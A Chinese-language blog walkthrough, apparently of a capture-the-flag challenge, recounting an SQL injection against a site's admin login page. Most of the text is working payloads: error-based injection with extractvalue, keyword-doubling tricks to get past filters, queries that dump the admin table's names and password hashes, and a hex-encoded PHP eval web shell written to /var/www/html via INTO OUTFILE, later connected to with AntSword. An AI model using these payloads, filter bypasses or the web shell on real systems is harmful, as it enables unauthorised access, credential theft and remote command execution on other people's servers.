本文详细描述了一次SQL注入攻击的过程,从发现后台登录界面的SQL注入漏洞,到利用报错注入获取数据库名、表名及字段名,并最终通过十六进制编码绕过过滤写入一句话木马,实现远程命令执行。过程中涉及的技巧包括特殊字符替换、LIMIT语法应用及文件写入。
先使用御剑扫一波,发现后台登录界面admin/login.php:
用户名一栏输入单引号,发现存在sql注入,
当输入admin’ or 1=1#后又返回正常的报错界面
看来闭合符号为单引号
注入开始:
admin' union select 1,2,3,4,5#
union 和select被过滤了
既然存在报错信息,我们就尝试报错注入,经过尝试and也被过滤了,and用an and d代替,union用un union ion代替,select用selselectect代替:
报错注入
admin' an and d extractvalue(1,concat(0x7e,(select database()),0x7e))#
爆出数据库名为dees
爆表名:
发现from、where、=也被过滤了,等号用like代替
admin’ an and d extractvalue(1,concat(0x7e,(selselectect table_name fro from m information_schema.tables wh where ere table_schema like ‘dees’ limit 0,1),0x7e))#
爆字段
admin' an and d extractvalue(1,concat(0x7e,(selselectect column_name fro from m information_schema.columns wh where ere table_name like 'bees_admin' limit 1,1),0x7e))#
admin_name
修改为limit 2,1
admin_password
爆值
admin’ an and d extractvalue(1,concat(0x7e,(selselectect admin_name fro from m bees_admin limit 0,1),0x7e))#
admin’ an and d extractvalue(1,concat(0x7e,(selselectect admin_password fro from m bees_admin limit 0,1),0x7e))#
想必是经过MD5加密了,解密后为admin。
登陆后台
账户:admin
密码:admin
找到上传图片的地方,打算写一波图片马,但连普通图片都上传不了,看来这个思路不可行
提示为:
网站位于/var/www/html目录下,淦!
user=admin' un union ion selselectect 1,2,3,4,5 i into nto outoutfilefile '/var/www/html/shell.php&password=1&code=abd5&submit=true&submit.x=60&submit.y=23
访问shell.php
下面直接写入一句话木马:
user=admin' un union ion selselectect 1,<?php @eval($_REQUEST['ABC']);?>,3,4,5 i into nto outoutfilefile '/var/www/html/1.php'&password=12&code=f333&submit=true&submit.x=49&submit.y=30
<、>也被过滤了
将一句话木马进行转换成16进制
user=admin' un union ion selselectect 1,0x3c3f70687020406576616c28245f524551554553545b27414243275d293b3f3e,3,4,5 i into nto outoutfilefile
'/var/www/html/123.php'#&password=12&code=f333&submit=true&submit.x=49&submit.y=30
蚁剑测试链接成功后在根目录下找到key
扫一扫
2423
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
